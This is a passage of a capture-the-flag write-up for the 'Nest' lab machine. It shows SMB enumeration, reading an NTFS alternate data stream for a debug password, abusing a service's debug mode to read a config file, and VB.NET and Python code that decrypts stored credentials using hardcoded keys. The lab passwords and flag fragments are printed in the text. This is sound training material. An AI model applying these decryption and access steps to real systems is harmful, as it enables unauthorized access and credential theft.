                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        ' Same mode as Encrypt; padding is left at the AES default (PKCS7).
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

root in WIP/RU/RUScanner


Decrypting the Password

We can cut and patch some of this code together into a single file we can run on dotnetfiddle.
I put the encrypted password string I got earlier into the Return Decrypt line and run it. The decryption happens here:

Decrypt("HASH", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

So the change is from:

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
        ' replace hash here
        Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function

to:

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
        ' replace hash here
        Return Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function

Execute this and we get the password xRxRxPANCAK3SxRxRx. This is the final result:



Exploitation

Enumerate C.Smith

Now that I have successfully decrypted the password, let's try logging in again with smbclient:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Sun Jan 26 07:04:21 2020
.. D 0 Sun Jan 26 07:04:21 2020
Administrator D 0 Fri Aug 9 23:08:23 2019
C.Smith D 0 Sun Jan 26 15:21:44 2020
L.Frost D 0 Fri Aug 9 01:03:01 2019
R.Thompson D 0 Fri Aug 9 01:02:50 2019
TempUser D 0 Thu Aug 8 06:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
. D 0 Sun Jan 26 15:21:44 2020
.. D 0 Sun Jan 26 15:21:44 2020
HQK Reporting D 0 Fri Aug 9 07:06:17 2019
user.txt A 32 Fri Aug 9 07:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
. D 0 Fri Aug 9 07:06:17 2019
.. D 0 Fri Aug 9 07:06:17 2019
AD Integration Module D 0 Fri Aug 9 20:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 20:18:42 2019
.. D 0 Fri Aug 9 20:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019

So it looks like I can now get user.txt, as you can see here:

# bash

smb: \> cd C.Smith
smb: \C.Smith\> ls
. D 0 Sun Jan 26 15:21:44 2020
.. D 0 Sun Jan 26 15:21:44 2020
HQK Reporting D 0 Fri Aug 9 07:06:17 2019
user.txt A 32 Fri Aug 9 07:05:24 2019

\C.Smith\HQK Reporting
. D 0 Fri Aug 9 07:06:17 2019
.. D 0 Fri Aug 9 07:06:17 2019
AD Integration Module D 0 Fri Aug 9 20:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 20:18:42 2019
.. D 0 Fri Aug 9 20:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019

10485247 blocks of size 4096. 6544137 blocks available
smb: \C.Smith\>

Grab the user flag

Finally I have user.txt; I downloaded it using smbclient:

# bash

smb: \C.Smith\> mget user.txt
Get file user.txt? y
getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\>

root in htb/boxes/Nest 
cut -c 4-12 user.txt
b25404be


Privilege Escalation

Going back to the first enumeration as C.Smith, there is an interesting .txt file and an executable, HqkLdap.exe, as you can see here:

# bash

\C.Smith\HQK Reporting
. D 0 Thu Aug 8 19:06:17 2019
.. D 0 Thu Aug 8 19:06:17 2019
AD Integration Module D 0 Fri Aug 9 08:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 08:18:42 2019
.. D 0 Fri Aug 9 08:18:42 2019
HqkLdap.exe A 17408 Wed Aug 7 19:41:16 2019

I initially came across the Debug Mode Password.txt file and thought it could be used to authenticate to the DEBUG mode of the HQK Reporting Service v1.2 running on port 4386, which we saw in the nmap scan. The file appeared to have 0 bytes. I spent some time searching further and couldn't find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could have alternate data streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file:

# bash

smb: \C.Smith\HQK Reporting\> more DEBUGM~1.TXT:Password:$DATA
getting file \C.Smith\HQK Reporting\DEBUGM~1.TXT:Password:$DATA of size 15 as /tmp/smbmore.mFLHg4 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

WBQ201953D8w
/tmp/smbmore.mFLHg4

smb: \C.Smith\>

If I run allinfo on it, I can see something else:

# bash

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w

This is really interesting: it shows the debug password WBQ201953D8w, which will be useful later.
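The lesson from the `allinfo` output above is that a 0-byte file can still carry data in a named NTFS stream. As an added example (not from the writeup), this parses smbclient `allinfo` output and flags files whose primary `::$DATA` stream is empty while a named stream holds data; the sample text is constructed to match the output shown above.

```python
"""Flag NTFS alternate data streams hidden behind an empty primary stream,
based on the `stream:` lines that smbclient's `allinfo` command prints."""
import re
from typing import Dict, List

# Constructed sample, shaped like the allinfo output for "Debug Mode Password.txt".
SAMPLE_ALLINFO = """\
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
"""

# "stream: [:<name>:$DATA], <size> bytes"; the primary stream has an empty name.
STREAM_RE = re.compile(r"^stream:\s*\[:(?P<name>[^:\]]*):\$DATA\],\s*(?P<size>\d+) bytes$")


def parse_streams(allinfo: str) -> Dict[str, int]:
    """Map stream name -> size in bytes; the unnamed primary stream is keyed as ''."""
    streams: Dict[str, int] = {}
    for line in allinfo.splitlines():
        m = STREAM_RE.match(line.strip())
        if m:
            streams[m.group("name")] = int(m.group("size"))
    return streams


def hidden_streams(allinfo: str) -> List[str]:
    """Names of non-empty alternate streams, i.e. data that a plain `ls` size of 0 conceals."""
    return sorted(name for name, size in parse_streams(allinfo).items() if name and size > 0)


def looks_suspicious(allinfo: str) -> bool:
    """True when ::$DATA is empty but at least one named stream carries data."""
    return parse_streams(allinfo).get("", 0) == 0 and bool(hidden_streams(allinfo))


if __name__ == "__main__":
    print(parse_streams(SAMPLE_ALLINFO))   # {'': 0, 'Password': 15}
    print(hidden_streams(SAMPLE_ALLINFO))  # ['Password']
```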

Enumeration with telnet

I'll connect again to HQK with telnet on port 4386 and start digging. With the debug password we gain the ability to run the SHOWQUERY command on the HQK Reporting Service, which can be used to read files. After spending some time searching around I came across the Ldap.conf file located in ../LDAP/.

# bash

root in htb/boxes/Nest
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>


Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

>

I set the directory to HQK:

# bash

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml

Current Directory: HQK
>


Current Directory: HQK
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1] HqkLdap.exe
[2] Ldap.conf

Current Directory: LDAP
>

I show Ldap.conf and it gives us Administrator credentials, but the password looks encrypted again.

# bash

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1] HqkLdap.exe
[2] Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

>

Analyzing the HqkLdap.exe

I downloaded HqkLdap.exe and analyzed it using JetBrains dotPeek, a free .NET decompiler and assembly browser:

# bash

smb: \C.Smith\HQK Reporting\AD Integration Module\> mget HqkLdap.exe
Get file HqkLdap.exe? y
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\>

Looking at the CR module binary:


This contains the arguments that we have to pass to the same script we used to decrypt the user hash: the hash found in Ldap.conf is encrypted with a different parameter set, the one found in the CR module. We pass these arguments to the Decrypt function and compile it.

Debugging the HqkLdap.exe

Do you remember the VB script that decrypts the encrypted password? I use it again to decrypt the admin password hash. I replace only this line:

from:

Decrypt("HASH", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256

to:

Decrypt("HASH", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
"yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256

This is the final script:

# vb.net

Imports System.Text
Imports System
Imports System.Security.Cryptography

Public Module Module1
    Public Sub Main()
        ' Ciphertext from Ldap.conf, with the passphrase, salt, iteration count and IV recovered from the CR module
        Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
    End Sub

    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String

        ' IV and salt are plain ASCII strings hardcoded in the binary
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        ' PBKDF2 (HMAC-SHA1) derives the AES key from the passphrase and salt
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        ' AES in CBC mode; PKCS7 padding is the provider default
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        ' The plaintext is never longer than the ciphertext once padding is stripped
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function
End Module


Copy and execute this in dotnetfiddle and we get the password:


Administrator password : XtH4nkS4Pl4y1nGX
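For readers without a .NET toolchain, here is a Python port of the VB Decrypt routine above, added here and not taken from the writeup or from HqkLdap.exe. It assumes the third-party `cryptography` package; Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1 and AesCryptoServiceProvider defaults to CBC with PKCS7 padding, which is why a fixed passphrase, salt and IV shipped inside a binary amount to reversible obfuscation rather than protection. The parameter sets and the expected result are the ones quoted on this page; the function and class names are mine.

```python
"""Python equivalent of the writeup's VB.NET Decrypt(cipherText, passPhrase,
saltValue, passwordIterations, initVector, keySize) routine."""
import base64
import hashlib
from dataclasses import dataclass

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


@dataclass(frozen=True)
class CryptoParams:
    """Hardcoded material recovered from a binary, in the order Decrypt() takes it."""
    passphrase: str
    salt: str
    iterations: int
    iv: str          # 16 ASCII characters, used directly as the AES-CBC IV
    key_bits: int    # 256 -> AES-256


# Parameter sets quoted on the page: RU_Config (user) and the CR module (Administrator).
USER_PARAMS = CryptoParams("N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
ADMIN_PARAMS = CryptoParams("667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)


def derive_key(p: CryptoParams) -> bytes:
    """Rfc2898DeriveBytes(passPhrase, saltBytes, iterations).GetBytes(keySize / 8)."""
    return hashlib.pbkdf2_hmac("sha1", p.passphrase.encode("ascii"),
                               p.salt.encode("ascii"), p.iterations, p.key_bits // 8)


def decrypt(cipher_b64: str, p: CryptoParams) -> str:
    """Base64 -> AES-CBC decrypt -> strip PKCS7 padding -> ASCII, as the VB code does."""
    dec = Cipher(algorithms.AES(derive_key(p)), modes.CBC(p.iv.encode("ascii"))).decryptor()
    padded = dec.update(base64.b64decode(cipher_b64)) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode("ascii")


def encrypt(plaintext: str, p: CryptoParams) -> str:
    """Forward direction, so the port can be checked by round trip on constructed input."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode("ascii")) + pad.finalize()
    enc = Cipher(algorithms.AES(derive_key(p)), modes.CBC(p.iv.encode("ascii"))).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode("ascii")


if __name__ == "__main__":
    # Ciphertext from Ldap.conf; the page reports the result as XtH4nkS4Pl4y1nGX
    print(decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", ADMIN_PARAMS))
```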

Grabbing the root.txt

Sadly we can't use this with Evil-WinRM; we don't have a proper shell, so we grab root.txt with smbclient only:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 15:20:50 2020
.. DR 0 Sun Jan 26 15:20:50 2020
desktop.ini AHS 282 Sun Jan 26 06:02:44 2020
root.txt A 32 Tue Aug 6 06:27:26 2019

10485247 blocks of size 4096. 6545433 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>

Download root.txt and finally:

# bash

root in htb/boxes/Nest
ls
'Debug Mode Password.txt' HqkLdap.exe IT 'Maintenance Alerts.txt' nmap-Nest Production Reports root.txt Shared user.txt 'Welcome Email.txt'

root in htb/boxes/Nest
cut -c 4-12 root.txt
c2eb084bc
root in htb/boxes/Nest



If you liked my writeup, please leave a respect on my profile.

Payas0


References:

dotPeek - .NET Decompiler and Assembly

dotnetfiddle